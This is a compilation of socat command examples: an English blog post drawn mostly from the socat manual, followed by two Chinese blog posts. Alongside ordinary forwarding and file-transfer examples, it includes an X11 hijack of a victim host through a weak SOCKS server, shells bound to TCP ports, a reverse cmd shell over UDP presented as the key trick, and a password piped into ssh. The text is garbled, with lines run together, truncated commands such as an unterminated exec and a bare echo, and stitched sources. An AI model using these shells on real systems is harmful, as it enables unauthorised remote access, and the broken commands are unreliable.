socat : Some useful commands
http://technostuff.blogspot.com/2008/10/some-useful-socat-commands.html
MONDAY, OCTOBER 6, 2008
Some useful socat commands
socat /dev/ttyS0,raw,echo=0,crnl /dev/ttyS1,raw,echo=0,crnlTo get time from time server:
socat TCP:time.nist.gov:13 -To forward local http port to remote http port:
socat TCP-LISTEN:80,fork TCP:www.domain.org:80To forward terminal to the serial port COM1:
socat READLINE,history=$HOME/.cmd_history /dev/ttyS0,raw,echo=0,crnl Simple file-transfer:
On the server-side:
socat TCP-LISTEN:port filenameTo send file fro the server:
socat TCP:hostname:port filenamesocat - TCP4:www.domain.org:80Transfers data between STDIO (-) and a TCP4 connection to port 80 of host www.domain.org. This example results in an interactive connection similar to telnet or netcat. The stdin terminal parameters are not changed, so you may close the relay with ^D or abort it with ^C.
socat -d -d READLINE,history=$HOME/.http_history \
TCP4:www.domain.org:www,crnl
This is similar to the previous example, but you can edit the current line in a bash like manner (READLINE) and use the history file .http_history; socat prints messages about progress (-d -d). The port is specified by service name (www), and correct network line termination characters (crnl) instead of NL are used.
socat TCP4-LISTEN:www TCP4:www.domain.org:www
Installs a simple TCP port forwarder. With TCP4-LISTEN it listens on local port "www" until a connection comes in, accepts it, then connects to the remote host (TCP4) and starts data transfer. It will not accept a second connection.
socat -d -d -lmlocal2 \
TCP4-LISTEN:80,bind=myaddr1,su=nobody,fork,range=10.0.0.0/8,reuseaddr \
TCP4:www.domain.org:80,bind=myaddr2
TCP port forwarder, each side bound to another local IP address (bind). This example handles an almost arbitrary number of parallel or consecutive connections by forking a new process after each accept(). It provides a little security by sudoing to user nobody after forking; it only permits connections from the private 10 network (range); due to reuseaddr, it allows immediate restart after master processes termination, even if some child sockets are not completely shut down. With -lmlocal2, socat logs to stderr until successfully reaching the accept loop. Further logging is directed to syslog with facility local2.
socat TCP4-LISTEN:5555,fork,tcpwrap=script \
EXEC:/bin/myscript,chroot=/home/sandbox,su-d=sandbox,pty,stderr
A simple server that accepts connections (TCP4-LISTEN) and forks a new child process for each connection; every child acts as single relay. The client must match the rules for daemon process name "script" in /etc/hosts.allow and /etc/hosts.deny, otherwise it is refused access (see "man 5 hosts_access"). For EXECuting the program, the child process chroots to /home/sandbox, sus to user sandbox, and then starts the program /home/sandbox/bin/myscript. Socat and myscript communicate via a pseudo tty (pty); myscripts stderr is redirected to stdout, so its error messages are transferred via socat to the connected client.
socat EXEC:"mail.sh target@domain.com",fdin=3,fdout=4 \
TCP4:mail.relay.org:25,crnl,bind=alias1.server.org,mss=512
mail.sh is a shell script, distributed with socat, that implements a simple SMTP client. It is programmed to "speak" SMTP on its FDs 3 (in) and 4 (out). The fdin and fdout options tell socat to use these FDs for communication with the program. Because mail.sh inherits stdin and stdout while socat does not use them, the script can read a mail body from stdin. Socat makes alias1 your local source address (bind), cares for correct network line termination (crnl) and sends at most 512 data bytes per packet (mss).
socat - /dev/ttyS0,raw,echo=0,crnl
Opens an interactive connection via the serial line, e.g. for talking with a modem. raw and echo set ttyS0's terminal parameters to practicable values, crnl converts to correct newline characters. Consider using READLINE instead of `-'.
socat UNIX-LISTEN:/tmp/.X11-unix/X1,fork \
SOCKS4:host.victim.org:127.0.0.1:6000,socksuser=nobody,sourceport=20
With UNIX-LISTEN, socat opens a listening UNIX domain socket /tmp/.X11-unix/X1. This path corresponds to local XWindow display :1 on your machine, so XWindow client connections to DISPLAY=:1 are accepted. Socat then speaks with the SOCKS4 server host.victim.org that might permit sourceport 20 based connections due to an FTP related weakness in its static IP filters. Socat pretends to be invoked by socksuser nobody, and requests to be connected to loopback port 6000 (only weak sockd configurations will allow this). So we get a connection to the victims XWindow server and, if it does not require MIT cookies or Kerberos authentication, we can start work. Please note that there can only be one connection at a time, because TCP can establish only one session with a given set of addresses and ports.
socat -u /tmp/readdata,seek-end=0,ignoreeof -
This is an example for unidirectional data transfer (-u). Socat transfers data from file /tmp/readdata (implicit address GOPEN), starting at its current end (seek-end=0 lets socat start reading at current end of file; use seek=0 or no seek option to first read the existing data) in a "tail -f" like mode (ignoreeof). The "file" might also be a listening UNIX domain socket (do not use a seek option then).
(sleep 5; echo PASSWORD; sleep 5; echo ls; sleep 1) |
socat - EXEC:'ssh -l user server',pty,setsid,ctty
EXECutes an ssh session to server. Uses a pty for communication between socat and ssh, makes it ssh's controlling tty (ctty), and makes this pty the owner of a new process group (setsid), so ssh accepts the password from socat.
socat -u TCP4-LISTEN:3334,reuseaddr,fork \
OPEN:/tmp/in.log,creat,append
Implements a simple network based message collector. For each client connecting to port 3334, a new child process is generated (option fork). All data sent by the clients are appended to the file /tmp/in.log. If the file does not exist, socat creats it. Option reuseaddr allows immediate restart of the server process.
socat READLINE,noecho='[Pp]assword:' EXEC:'ftp ftp.server.com',pty,setsid,ctty
Wraps a command line history (READLINE) around the EXECuted ftp client utility. This allows editing and reuse of FTP commands for relatively comfortable browsing through the ftp directory hierarchy. The password is echoed! pty is required to have ftp issue a prompt. Nevertheless, there may occur some confusion with the password and FTP prompts.
socat PTY,link=$HOME/dev/vmodem0,raw,echo=0,waitslave exec:'
Generates a pseudo terminal device (PTY) on the client that can be reached under the symbolic link $HOME/dev/vmodem0. An application that expects a serial line or modem can be configured to use $HOME/dev/vmodem0; its traffic will be directed to a modemserver via ssh where another socat instance links it with /dev/ttyS0.
socat TCP4-LISTEN:2022,reuseaddr,fork \
PROXY:proxy:www.domain.org:22,proxyport=3128,proxyauth=user:pass
starts a forwarder that accepts connections on port 2022, and directs them through the proxy daemon listening on port 3128 (proxyport) on host proxy, using the CONNECT method, where they are authenticated as "user" with "pass" (proxyauth). The proxy should establish connections to host www.domain.org on port 22 then.
echo |socat -u - file:/tmp/bigfile,create,largefile,seek=100000000000
creates a 100GB sparse file; this requires a file system type that supports this (ext2, ext3, reiserfs, jfs; not minix, vfat). The operation of writing 1 byte might take long (reiserfs: some minutes; ext2: "no" time), and the resulting file can consume some disk space with just its inodes (reiserfs: 2MB; ext2:16KB).
socat tcp-l:7777,reuseaddr,fork system:filan -i 0 -s >&2,nofork
listens for incoming TCP connections on port 7777. For each accepted connection, invokes a shell. This shell has its stdin and stdout directly connected to the TCP socket (nofork). The shell starts filan and lets it print the socket addresses to stderr (your terminal window).
echo -e
functions as primitive binary editor: it writes the 4 bytes 000 014 000 000 to the executable /usr/bin/squid at offset 0x00074420 (this is a real world patch to make the squid executable from Cygwin run under Windows, actual per May 2004).
socat - tcp:www.blackhat.org:31337,readbytes=1000
connect to an unknown service and prevent being flooded.
socat用法
socat是类似nc(netcat)的软件,很久之前就听过,最近才开始使用。
之前不用它的原因是同样的功能,socat要比nc要多打一些字符,实际上nc我也很少有,以至于记不全它的参数。最近想调试使用unixsock文件,发现gnu netcat实现不了,而openbsd netcat可以实现,而gnu netcat的一些选项openbsd netcat没有,而且服务器上只有gnu netcat,于是想还是用socat比较清净,而且功能更强大。
socat的基本用法还是比较简单的:
监听端口:
socat tcp-l:12345 -
发送到端口:
echo xxx | socat - tcp:127.0.0.1:12345
其中tcp-l是tcp-listen的简写,tcp是tcp-connect的简写,简写后就不比nc长多少了。
udp: udp-listen, udp-connect
unix socket: unix-listen, unix-connect
unix datagram socket: unix-recvfrom, unix-sendto
发送文件:
ip1 # socat -u open:a.txt tcp-listen:8888
ip2 # socat -u tcp:ip1:8888 open:a.txt,create
开telnet:
ip1 # socat tcp-listen:8888 exec:bash,pty,stderr
ip2 # socat readline tcp:ip1:888
端口转发(好像是这样,没用过):
ip1(外网机器的内网地址) # socat tcp-listen:1234 tcp-listen:3389
ip2(内网机器) # socat tcp:ip1的外网地址:1234 tcp:ip1:3389
socat 使用方法与一点点心得
socat是一個netcat(nc)的替代產品,可以稱得上nc++。socat的特點就是在兩個流之間建立一個雙向的 通道。socat的地址類型很 多,有ip, tcp, udp, ipv6, pipe,exec,system,open,proxy,openssl,等等。看一個例子:
c:\>socat - tcp:192.168.1.18:80
這個命令等同於 nc 192.168.1.18 80。 socat裡面,必須有兩個流,所以第一個參數-代表標準的輸入輸出,第二個流連接到192.168.1.18的80端口。再看一個反向telnet的例子:
on server:
c:\>socat tcp-listen:23 exec:cmd,pty,stderr
這個命名把cmd綁定到端口23,同時把cmd的Stderr重定向到stdout。
on client:
c:\>socat readline tcp:server:23
連接到服務器的23端口,即可獲得一個cmd shell。readline是gnu的命令行編輯器,具有歷史功能。
再看文件傳遞的例子。nc也經常用來傳遞文件,但是nc有一個缺點,就是不知道文件什麼時候傳完了,一般要用Ctrl+c來終止,或者估計一個時間,用-w參數來讓他自動終止。用socat就不用這麼麻煩了:
on host 1:
c:\>socat -u open:myfile.exe,binary tcp-listen:999
on host 2:
c:\>socat -u tcp:host1:999 open:myfile.exe,create,binary
這個命令把文件myfile.exe用二進制的方式,從host 1 傳到host 2。-u 表示數據單向流動,從第一個參數到第二個參數,-U表示從第二個到第一個。文件傳完了,自動退出。
再來一個大家喜歡用的例子。在一個NAT環境,如何從外部連接到內部的一個端口呢?只要能夠在內部運行socat就可以了。
外部:
c:\>socat tcp-listen:1234 tcp-listen:3389
內部:
c:\>socat tcp:outerhost:1234 tcp:192.168.12.34:3389
這樣,你外部機器上的3389就影射在內部網192.168.12.34的3389端口上。
socat還具有一個獨特的讀寫分流功能,比如:
c:\>socat open:read.txt!!open:write.txt,create,append tcp-listen:80,reuseaddr,fork
這個命令實現一個假的web server,客戶端連過來之後,就把read.txt裡面的內容發過去,同時把客戶的數據保存到write.txt裡面。”!!”符號用戶合併讀寫流,前面的用於讀,後面的用於寫。
上面的全是抄的别人的,自己试用发现了一些问题。
1、socat是支持cmdshell反连的,这点最重要的我在google和百度了一堆都没找到,自己研究了半天出来了。
server:socat readline udp-listen:port -------socat支持udp、tcp、https等,我测试了tcp和udp
client:socat udp:serverip:port exec:cmd,pty,stderr
2、端口转发功能:上文写的是错误的,根本无法实现。大家测试过就知道了。
正确的应该如下:
外部:socat tcp-listen:11161,reuseaddr,fork tcp-listen:9833
内部:socat tcp:外部ip:11161,reuseaddr,fork tcp:127.0.0.1:3389
不加reuseaddr,fork是无法成功连接的,具体原因大家可以再百度下,有详细介绍。
